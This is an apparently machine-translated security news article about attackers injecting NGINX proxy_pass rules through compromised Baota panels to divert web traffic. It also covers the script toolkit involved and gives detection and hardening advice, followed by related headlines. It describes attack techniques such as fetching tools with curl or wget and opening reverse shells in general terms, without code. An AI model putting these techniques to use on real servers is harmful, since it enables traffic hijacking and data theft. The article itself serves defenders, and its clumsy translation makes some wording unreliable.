Cybersecurity researchers have brought to light an active campaign that manipulates NGINX facilities and management panels such as Baota (BT) to divert legitimate web traffic to infrastructure controlled by attackers. The technique does not focus on breaking the cryptography or exploiting a failure in the user's browser: instead, it modifies the web server's own configuration so that it quietly acts as a proxy to malicious destinations.
The Datadog Security Labs team has been one of the first to document this activity, linking it to the wave of exploitation of the failure known as React2Shell (referred to in its report as CVE-2025-55182). According to their analysis, the attackers inject NGINX configuration blocks that capture incoming applications on specific routes and retransmit them through the directive. proxy _ pass to servers under your control, so you can inspect, modify or take advantage of visitors' communications. More technical details and examples are available in the Datadog report Here. and the explanation of the proxy _ pass directive in the official NGINX documentation can be found in this link.
What makes this campaign particularly dangerous is its automated character and persistence: the attackers have deployed a set of scripts that orchestrate the search for targets, the modification of files and the survival of compromised systems. The names identified by the researchers include zx.sh, which launches the following stages and uses common utilities such as curl or wget - or even raw TCP connections if those tools are blocked -; bt.sh, which specifically points to environments with the Baota panel to overwrite configurations; 4zdh.sh and zdh.sh, which seek regular NGINX locations and refine the scope of the intrusion; and ok.sh, which generates a report of active malicious rules. These pieces form what analysts describe as a multilevel toolkit designed both to discover objectives and to implement and maintain malicious redirection rules.
The operators behind this campaign do not seem uniform in their final objectives. GreyNoise, who monitors large-scale hostile network activity, identified that a few IP addresses have led most of the exploitative attempts after React2Shell's disclosure, and that post-exploit payloads vary: some recover executable for cryptominery, while others open reverse shells, suggesting interest in both automated resource use and interactive access. The analysis of GreyNoise can be reviewed Here..
Another relevant data is the geographical and sectoral focus of the attackers. The observed patterns show preference for higher-level domains of certain countries in Asia (.in, .id, .pe, .bd, .th), Chinese hosting infrastructure and institutional spaces such as .edu and .gov.domains. In addition, this activity comes in the context of large-scale recognition campaigns that have sought access panels for products such as Citrix ADC and Netscaler Gateway through massive rotation of residential proxies and use of PIs in the public cloud, a coordinated effort that GreyNoise has documented in its recognition analysis Here..
What are the risks of a committed NGINX sending requests to attacking infrastructure? The consequences range from the theft of credentials and the collection of sensitive data to the possibility of inserting malicious content (e.g. scripts that affect users' browsers) or of routing traffic to intermediate servers for espionage operations. There is also the option to deploy later loads for mining or back doors that facilitate side movements within a corporate network.
For those who manage web servers, the signs of such commitments are clear if you know where to look: unexpected "location" configurations that point to external upstreams, including recent files in / etc / nginx or equivalent routes, repeated NGINX recharges outside the usual times, and processes that start persistent outgoing connections to unknown directions. It is recommended to review the integrity of the configuration files with backup, to audit real-time changes where possible and to limit access to management panels such as Baota through access control lists and strong authentication.
In addition to immediate detection and mediation, the defence requires preventive action: keeping servers and administration panels up to date, patching publicly exploited vulnerabilities (such as those associated with React2Shell), restricting outgoing traffic by means of network release rules to prevent unauthorized communications, and monitoring commitment indicators related to typical post-exploitation loads (miners or reverse shells). It is also appropriate to control the download tools and utilities in the systems, as attackers use curl, wget or direct TCP connections to bring their components.
This incident recalls that the attack surface is not limited to the code of web applications, but includes the very layer of infrastructure that serves them. A subtle change in NGINX settings can turn a legitimate server into a malicious intermediary without the owner noticing it immediately. The recommendation for operators and security equipment is to act quickly: audit configurations, verify the source of changes and ensure that management interfaces are protected and monitored.
To deepen the technical findings and tactics used by the attackers, please refer to Datadog Security Labs' reports on the hijacking of traffic in NGINX. Here. and GreyNoise's follow-up on farm consolidation and recognition campaigns Here. and Here.. It is also useful to review NGINX's official documentation on changing proxy to better understand how the proxy _ pass directive is used in legitimate contexts in this link.
In short, the combination of previously known vulnerabilities, accessible management panels and an automated toolkit has allowed attackers to scale up a campaign capable of redirecting large-scale traffic. The good news is that with basic access controls, monitoring focused on configuration changes and strict egress policies can significantly reduce operating windows and detect intrusions quickly.
18-year-old Ukrainian youth leads a network of infostealers that violated 28,000 accounts and left $250,000 in losses
The Ukrainian authorities, in coordination with US agents. They have focused on an operation of infostealer which, according to the Ukrainian Cyber Police, was allegedly adminis...
RAMPART and Clarity redefine the safety of IA agents with reproducible testing and governance from the start
Microsoft has presented two open source tools, RAMPART and Clarity, aimed at changing the way the safety of IA agents is tested: one that automates and standardizes technical te...
The digital signature is in check: Microsoft dismands a service that turned malware into apparently legitimate software
Microsoft announced the disarticulation of a "malware-signing-as-a-service" operation that exploited its device signature system to convert malicious code into seemingly legitim...
A single GitHub workflow token opened the door to the software supply chain
A single GitHub workflow token failed in the rotation and opened the door. This is the central conclusion of the incident in Grafana Labs following the recent wave of malicious ...
WebWorm 2025: the malware that is hidden in Discord and Microsoft Graphh to evade detection
The latest observations by cyber security researchers point to a change in worrying tactics of an actor linked to China known as WebWorm: in 2025 it has incorporated back doors ...
Identity is no longer enough: continuous verification of the device for real-time security
Identity remains the backbone of many security architectures, but today that column is cracking under new pressures: advanced phishing, real-time proxyan authentication kits and...
The dark matter of identity is changing the rules of corporate security
The Identity Gap: Snapshot 2026 report published by Orchid Security puts numbers to a dangerous trend: the "dark matter" of identity - accounts and credentials that are neither ...